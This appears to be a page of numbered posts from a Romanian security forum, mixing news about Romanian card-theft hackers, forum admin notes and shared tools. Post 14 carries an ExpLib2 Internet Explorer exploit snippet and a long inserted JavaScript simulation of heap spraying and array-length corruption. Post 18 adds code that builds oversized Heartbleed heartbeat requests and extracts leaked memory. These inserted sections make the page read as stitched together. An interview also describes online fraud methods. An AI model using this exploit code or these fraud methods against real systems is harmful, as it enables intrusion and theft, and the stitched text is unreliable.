Federal prosecutors needed 3 years to catch the Romanian hackers, Cezar Butu, Adrian Tiberiu Oprea and Iulian Dolan, who managed to break into the security systems of several American retailers and steal the identification numbers of over 100,000 credit and debit cards in the USA. Cezar Butu was sentenced to 1 year and 9 months in prison for running electronic fraud operations and stealing financial data, after pleading guilty in September 2012.

Using a piece of software, the Romanians searched the Internet for vulnerable computers belonging to US retailers, broke into the databases and stole the shoppers' card numbers, which they later distributed to their own clients, scattered all over the world. Subway, the American fast-food restaurant chain, was one of the most affected retailers. After several complaints from partner banks, the federal police discovered that the hackers were using a program that captured all the information entering the banking system at the moment customers paid for their orders by card, through the POS terminal. User names and e-mails had been changed to protect their identity, but the hackers were careless, choosing to communicate in their mother tongue and to password-protect certain information using words that were also in Romanian, such as Cărăbuș05.

Last October, federal prosecutors picked up the Romanians' trail after one of them, Adrian Tiberiu Oprea, mentioned in an online conversation that the Romanian Police had raided his home address in an investigation into hacking activities in Eastern Europe. Adrian Tiberiu Oprea, aged 27, is a graduate of the Faculty of Automation and Computers in Constanța. After going through more than 15,000 e-mails and posts on social networking sites, the US Secret Service agent in charge of the case, Matt O'Neill, discovered the identity of one of Oprea's partners, Cezar Butu, a 27-year-old Romanian living in France, and of Iulian Dolan, also involved in the fraud.

The 3 hackers pleaded guilty, admitting that they had compromised more than 800 stores in the USA, of which more than 250 belonged to the Subway restaurant chain. Dolan and Oprea later stated that Subway had not been their target, but that they had been lucky to discover that they could break into a very large number of computers because of the poor security. The hackers did not make large profits from their operations. Oprea accumulated "only" 40,000 dollars in his account. He was ordered to pay 12.5 million dollars in damages to financial institutions and another 5 million dollars towards improving the security system of the Subway restaurant chain. In September 2012, Oprea received a 15-year prison sentence, while Dolan will remain behind bars for 7 years.

Source: Povestea celor trei hackeri români care au reușit să spargă sistemele de securitate ale retailerilor americani | Ziarul Financiar
Preferred reading: http://www.bloomberg.com/news/2014-04-17/u-s-agent-lures-romanian-hackers-in-subway-data-heist.html
  13. I've added Tapatalk support. Link: http://tapatalk.com/ Search for "rstforums.com" to find the forum. Edit: It's really cool, I recommend it.
  14. "Hack Away at the Unessential" with ExpLib2 in Metasploit. Posted by Wei Chen in Metasploit on Apr 7, 2014 11:26:18 AM. This blog post was jointly written by Wei sinn3r Chen and Juan Vazquez. Memory corruption exploitation is not how it used to be. With modern mitigations in place, such as GS, SafeSEH, SEHOP, DEP, ASLR/FASLR, EAF+, ASR, VTable guards, memory randomization, sealed optimization, etc., exploit development has become much more complicated. It definitely shows when you see researchers jumping through hoops like reverse-engineering some 0-day vulnerability and the software, turning a use-after-free crash into an arbitrary write, leaking an object and disclosing a module base, and customizing ROP and shellcode. Watching an exploit developer work is like watching a : you see him trying to thrust, hack, kick, hitting left and right, from the ground all the way to the rooftops, and then the next thing you know he just popped a shell. It's all very fancy. Oh, and it's real. Despite all the fanciness of modern exploitation, security researcher Yuki Chen (who is the exploit dev version of Bruce Lee) took a different turn. If you're not much of a Bruce Lee fan, well, Lee was really big on the philosophy of simplicity. In his words: "It's not the daily increase but daily decrease. Hack away at the unessential." What Yuki Chen wanted to do was avoid dealing with the hassle of EAF, DEP, shellcode, and other things. Basically, going for the most straightforward punch with the least amount of effort. His idea of simplicity and the creation of ExpLib2 are what make him so Bruce Lee. However, we noticed that the security community hasn't been talking about his stuff much, so here we'd like to go over his work on ExpLib2 in more depth, hopefully to spark more interest. ExpLib2 is basically Yuki's exploitation library for Internet Explorer.
To be able to use this, it assumes you already have a bug that gives you an arbitrary write. You then use this bug to modify the length field of an array in memory, tell the library where that array is and what payload to run, and that's all it needs from you. To give you an idea of how much you're writing for the exploit, take a good look at the following example:

    function modifyArray() {
        // Use your bug and modify the array here
        // For testing, we do: ed 1a1b3000+18 400
    }

    function example() {
        var num_arrays = 98688;
        var arr_size = (0x1000 - 0x20)/4;
        var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_exec('calc.exe') );
        explib.setArrContents([0x21212121, 0x22222222, 0x23232323, 0x24242424]); // There is a default one too
        explib.spray();
        modifyArray();
        explib.go(); // Code execution
    }

The go() function from ExpLib2 will then use the information you initialized and leak objects in order to figure out where the security manager is, make a copy of it, modify it (and patch other necessary functions), so that the ScriptEngine functions end up using your fake security manager, and execute your payload in "god mode". This is pretty much the summarized version of the technique, which is also briefly explained in Yuki's original paper, "Exploit IE Using Scriptable ActiveX Controls", but let's take a closer look at this magic trick. Full article: https://community.rapid7.com/community/metasploit/blog/2014/04/07/hack-away-at-the-unessential-with-explib2-in-metasploit
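To make the spray-and-corrupt step above concrete, here is an added simulation (not code from ExpLib2 or from the Rapid7 post) that models the memory layout the snippet relies on: page-sized arrays sprayed back to back, each with a 0x20-byte header whose length dword sits at +0x18, which is what the test comment's `ed 1a1b3000+18 400` overwrites. The header size and the field offset are read off those two numbers in the snippet and are assumptions about the engine's layout for the purposes of the model; the fake heap, its base address and page count are constructed for the demo. The point it shows is why a single corrupted length becomes a relative out-of-bounds read that reaches the neighbouring array's header, which is the primitive go() builds its object leaks on.

```javascript
// Added simulation of the ExpLib2 spray / length-corruption primitive.
// Not ExpLib2 code: a flat Uint32Array stands in for process memory.
const PAGE = 0x1000;
const HDR = 0x20;                  // assumed array header size (from (0x1000 - 0x20)/4 in the snippet)
const LEN_OFF = 0x18;              // assumed offset of the length dword (from "ed 1a1b3000+18 400")
const ARR_SIZE = (PAGE - HDR) / 4; // 0x3f8 = 1016 elements: header + data fill exactly one page

class FakeHeap {
  constructor(base, pages) {
    this.base = base;
    this.mem = new Uint32Array((pages * PAGE) / 4);
  }
  idx(addr) {
    if (addr < this.base || addr + 4 > this.base + this.mem.length * 4) {
      throw new RangeError("access outside the simulated heap: 0x" + addr.toString(16));
    }
    return (addr - this.base) >>> 2;
  }
  read32(addr) { return this.mem[this.idx(addr)]; }
  write32(addr, value) { this.mem[this.idx(addr)] = value >>> 0; }
}

// Lay out `numArrays` page-sized arrays back to back, like explib.spray().
function spray(heap, numArrays, contents) {
  const addrs = [];
  for (let i = 0; i < numArrays; i++) {
    const a = heap.base + i * PAGE;
    heap.write32(a + LEN_OFF, ARR_SIZE);
    for (let j = 0; j < ARR_SIZE; j++) {
      heap.write32(a + HDR + 4 * j, contents[j % contents.length]);
    }
    addrs.push(a);
  }
  return addrs;
}

// ExpLib2-style scan: the corrupted array is the one whose length no longer matches.
function findCorrupted(heap, addrs) {
  for (let i = 0; i < addrs.length; i++) {
    if (heap.read32(addrs[i] + LEN_OFF) !== ARR_SIZE) return i;
  }
  return -1;
}

// An element read checked against the (possibly corrupted) length field,
// which is how the engine's bounds check behaves once the length lies.
function readElement(heap, arrAddr, index) {
  const len = heap.read32(arrAddr + LEN_OFF);
  if (index < 0 || index >= len) throw new RangeError("index " + index + " out of bounds");
  return heap.read32(arrAddr + HDR + 4 * index);
}

function demoSpray() {
  const target = 0x1a1b3000;                // the address passed to ExpLib in the snippet
  const heap = new FakeHeap(0x1a1b0000, 8); // constructed: 8 pages around the target
  const addrs = spray(heap, 8, [0x21212121, 0x22222222, 0x23232323, 0x24242424]);

  // Before corruption the bounds check stops a read at index 1016.
  let blockedBefore = false;
  try { readElement(heap, target, ARR_SIZE); } catch (e) { blockedBefore = e instanceof RangeError; }

  heap.write32(target + LEN_OFF, 0x400);     // the "bug": ed 1a1b3000+18 400
  const i = findCorrupted(heap, addrs);

  // 0x400 = 1024 > 1016, so indices 1016..1023 now fall inside the next array's header;
  // index 1016 + 0x18/4 is that array's length dword, the first thing a leak reads.
  const neighbourLen = readElement(heap, addrs[i], ARR_SIZE + LEN_OFF / 4);
  return { blockedBefore, corruptedIndex: i, corruptedAddr: addrs[i], neighbourLen };
}
```

demoSpray() finds the corrupted array three pages past the constructed base and reads the neighbour's length field through the enlarged array; in the real library the same relative read is pointed at the header of a sprayed object instead, to leak a vtable and from it the module base.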
  15. vB5 has been out for a while now; I was hoping it would be stable. It's fine as a forum, very fine, it's just that there are still problems. Well, there are many problems, but we didn't expect them, especially security ones. Posts can be imported, manually, with some work, but there are too few of them and it's not worth the effort. Was there anything important? As an idea, they moved to the concept of a "node". Forums are nodes. Posts are nodes. Visitor messages are nodes. They all get lumped together in the same table. There is a "contenttypeid" that specifies their type. It's fine as an architecture, more complex and modular. But it's ugly to import and I'm not getting into that.
  16. Does it work now? Thanks.
  17. The Romanian town that scared the planet. 100,000 dollars a week are made there, even though only a few people live in it. To tourists, Râmnicu Vâlcea is a quiet town with lots of greenery. Located at the edge of the Carpathians, in central Romania, nobody suspects this town's secret, buried in the working-class neighbourhood of Ostroveni: the local hacker network has scared the entire planet, Le Monde writes in a piece picked up by worldcrunch.com and cited by incont.ro. You have to leave the main boulevard, which cuts the town in two, and walk the narrow streets lined with houses built during the communist period to realize that something is wrong in this town of roughly 100,000 inhabitants. Next to the shabby buildings put up under the communist dictatorship, only expensive cars are parked. Alongside the latest-model cars, 20- to 30-year-olds flaunt a prosperity that contrasts with the poor surroundings. Welcome to the land of the hackers! Râmnicu Vâlcea, with its Ostroveni neighbourhood, is known as Hackerville, because it is the capital of online theft. Online shoppers from every country (French, British, German, Italian, but above all American) have been cheated by Romanian hackers. According to the Romanian Police, 80% of the victims come from the US. In Ostroveni, everybody knows what is going on, but the code of silence works very well. One of the hackers agreed to talk to Le Monde's journalists about his business, as long as he remained anonymous. "It's easier with the Americans because they even buy their bread online; they're used to doing everything on the internet," the young man said. He claims he pulls off four or five jobs a week and ends up with a few tens or a few hundreds of thousands of dollars. "We live in a big world full of idiots who are ready to do everything online. We sell fictitious products, clone other sites and steal credit card data.
In Europe, to get hold of the money, we use the so-called  or , who redirect the money sent to a particular account. They keep 30% of the money and send us the rest through Western Union," the hacker explains. And judging by the number of transactions made through Western Union in Râmnicu Vâlcea, business seems to be booming, Le Monde's journalists comment. More on incont.ro. Source: Orașul din România care a speriat planeta. Se câștigă 100.000 dolari/săptămână deși trăiesc câțiva oameni | Obiectiv - Mobil. I know, it's a cheap article, but I believe articles like this appear about "us" in the international press.
  18. [h=1]heartleech[/h] A typical "heartbleed" tool. What makes this different is:
    - autopwn mode (-a) that does all the steps needed to get the private key
    - post-handshake (encrypted) heartbeats instead of during handshake
    - evades Snort IDS rules
    - loops making repeated requests (-l <loopcount>)
    - dumps binary data to file (-f <filename>)
    - IPv4 or IPv6 (-v <IPver>)
    - full 64k heartbleeds
    Source: https://github.com/robertdavidgraham/heartleech
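As an added example (not heartleech's own code, which is C), here is the wire format behind the "full 64k heartbleeds" item: an RFC 6520 heartbeat request whose payload_length field claims more bytes than the payload actually sent, plus a check that tells a leaking response apart from a patched server's. It covers only the plaintext, during-handshake form that the README contrasts with its encrypted post-handshake mode. The two server behaviours and the "adjacent memory" are constructed inside the block rather than captured from a real host, and the TLS version bytes in the sample are an assumption.

```javascript
// Added example: RFC 6520 heartbeat records as used by Heartbleed checks.
// Not code from heartleech; constructed responses stand in for a live server.
const TLS_HEARTBEAT = 0x18;    // TLS record content type for heartbeats
const HB_REQUEST = 0x01;
const HB_RESPONSE = 0x02;
const HB_PADDING = 16;         // RFC 6520 minimum padding
const MAX_HB_PAYLOAD = 0xffff; // payload_length is 16 bits: the "full 64k"

// Build one TLS record carrying a heartbeat request whose payload_length
// claims `claimedLen` bytes while only `payload` is actually sent.
function buildHeartbeatRequest(claimedLen, payload, version = 0x0302) {
  if (claimedLen > MAX_HB_PAYLOAD) throw new RangeError("payload_length is a 16-bit field");
  const body = Buffer.alloc(1 + 2 + payload.length + HB_PADDING);
  body[0] = HB_REQUEST;
  body.writeUInt16BE(claimedLen, 1);
  payload.copy(body, 3);
  const rec = Buffer.alloc(5 + body.length);
  rec[0] = TLS_HEARTBEAT;
  rec.writeUInt16BE(version, 1);   // assumed TLS 1.1 version bytes for the sample
  rec.writeUInt16BE(body.length, 3);
  body.copy(rec, 5);
  return rec;
}

// Parse a heartbeat response and report how many bytes beyond the payload we
// sent came back. Returns null when the record is not a heartbeat response
// (a fixed server silently drops a malformed heartbeat instead of answering).
function checkHeartbeatResponse(rec, sentLen) {
  if (rec === null || rec.length < 5 || rec[0] !== TLS_HEARTBEAT) return null;
  const recLen = rec.readUInt16BE(3);
  const body = rec.subarray(5, 5 + recLen);
  if (body.length < 3 || body[0] !== HB_RESPONSE) return null;
  const echoedLen = body.readUInt16BE(1);
  const available = body.length - 3 - HB_PADDING;   // bytes actually present after the header
  const usable = Math.min(echoedLen, available);
  return {
    claimedLength: echoedLen,
    leakedBytes: Math.max(0, usable - sentLen),
    truncated: available < echoedLen,
    leaked: body.subarray(3 + sentLen, 3 + usable),
  };
}

// Constructed stand-in for a vulnerable server: it trusts payload_length and
// copies that many bytes starting at the request payload, so everything past
// the real payload is whatever sat next to it in memory (`leakedMemory` here).
function vulnerableResponse(request, leakedMemory) {
  const claimed = request.readUInt16BE(6);
  const sentLen = request.readUInt16BE(3) - 3 - HB_PADDING;
  const body = Buffer.alloc(3 + claimed + HB_PADDING);
  body[0] = HB_RESPONSE;
  body.writeUInt16BE(claimed, 1);
  request.copy(body, 3, 8, 8 + sentLen);
  leakedMemory.copy(body, 3 + sentLen, 0, claimed - sentLen);
  const rec = Buffer.alloc(5 + body.length);
  rec[0] = TLS_HEARTBEAT;
  rec.writeUInt16BE(request.readUInt16BE(1), 1);
  rec.writeUInt16BE(body.length, 3);
  body.copy(rec, 5);
  return rec;
}

// Constructed stand-in for a patched server: payload_length must match what
// the record really carries, otherwise the message is dropped without a reply.
function patchedResponse(request) {
  const claimed = request.readUInt16BE(6);
  const sentLen = request.readUInt16BE(3) - 3 - HB_PADDING;
  return claimed === sentLen ? vulnerableResponse(request, Buffer.alloc(0)) : null;
}

function demoHeartbeat() {
  const probe = buildHeartbeatRequest(0x100, Buffer.from("A"));        // claims 256, sends 1
  const heapSample = Buffer.from("session=deadbeef user=alice ...");  // constructed "adjacent memory"
  const vuln = checkHeartbeatResponse(vulnerableResponse(probe, heapSample), 1);
  const fixed = checkHeartbeatResponse(patchedResponse(probe), 1);
  return { vulnLeaked: vuln.leakedBytes, leakedPrefix: vuln.leaked.subarray(0, 8).toString(), fixed };
}
```

The probe in demoHeartbeat() uses a small claimed length; a scanner would use MAX_HB_PAYLOAD for the full 64k, and an encrypted post-handshake variant wraps the same body in a TLS record protected by the negotiated cipher, which is why signature-based IDS rules written for the plaintext form miss it.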
  19. Screw you, you're still not happy; there was no way to port the data from the new platform over here, it has a different internal database structure.
  20. [h=1]Matrix Style[/h]
    # Green "digit rain": each row has 16 cells, about one in five shows a random bit, bold or dim
    echo -e "\e[32m"; while :; do for i in {1..16}; do r="$(($RANDOM % 2))"; if [[ $(($RANDOM % 5)) == 1 ]]; then if [[ $(($RANDOM % 4)) == 1 ]]; then v+="\e[1m $r "; else v+="\e[2m $r "; fi; else v+=" "; fi; done; echo -e "$v"; v=""; done
    # Replace every non-digit byte from /dev/urandom with a space, wrap to the terminal width, colour the digits green
    tr -c "[:digit:]" " " < /dev/urandom | dd cbs=$COLUMNS conv=unblock | GREP_COLOR="1;32" grep --color "[^ ]"
    # Same, with a C locale so tr treats the random input as plain bytes rather than multibyte characters
    LC_ALL=C tr -c "[:digit:]" " " < /dev/urandom | dd cbs=$COLUMNS conv=unblock | GREP_COLOR="1;32" grep --color "[^ ]"
    Others: Matrix Style | commandlinefu.com
  21. A job opening matching your profile for a position of Information Security Monitoring Officer-033319 has just been posted in our Career Section. If you would like to apply online, click here or click Jobs to consult the list of other positions currently available. We thank you for your interest in ING. Best regards, The ING Recruitment team // I received this automatically.
  22. Hi, following the problems with vBulletin 5 we have decided to go back to the old forum. In the meantime we'll work on the new version and launch it when everything is ready. For now we all say to hell with vBulletin and their garbage. Screw the lot of them. If you have problems, post here. Have fun!
  23. RST Mobile: The solution comes from vBulletin; we're not going to start building mobile apps ourselves. It only supports Android and iPhone.
  24. RST Mobile: Do you access RST from a smartphone, or would you like to? PS: Android and iPhone.
  25. The fuck? "First, Mylar allows the server to perform keyword search over encrypted documents, even if the documents are encrypted with different keys."